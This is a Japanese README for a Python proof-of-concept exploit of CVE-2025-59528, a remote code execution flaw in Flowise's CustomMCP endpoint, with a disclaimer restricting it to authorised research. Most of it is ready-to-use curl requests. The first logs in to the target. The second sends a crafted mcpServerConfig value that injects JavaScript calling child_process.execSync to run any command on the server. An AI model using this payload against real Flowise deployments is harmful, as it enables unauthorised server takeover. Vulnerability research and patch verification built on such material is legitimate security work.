
CVE-2025-59528 概念実証
PythonのPoCスクリプト。POST /api/v1/node-load-method/customMCP 経由でFlowiseの CustomMCP RCEパスをトリガーします。
⚠️ 教育目的および許可されたセキュリティ研究のみに使用してください。 このツールを、自分が所有していないシステムや、テストのための書面による許可がないシステムに対して実行することは違法です。
im-soohyun (Kim SooHyun)CVE-2025-59528 の PoC3.0.53.0.6poc.py: マシンのURL/IP、ベアなホスト/IPを使用する場合のオプションのプロトコル、メールアドレス、パスワード、コマンドを入力します。ログインし、クッキーを再利用し、細工された CustomMCP リクエストを送信し、curl -i と同様にHTTPステータス、ヘッダー、レスポンスボディを表示します。実行:
python3 poc.py
次に以下を入力:
10.10.11.10、http://10.10.11.10、https://target.example)curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'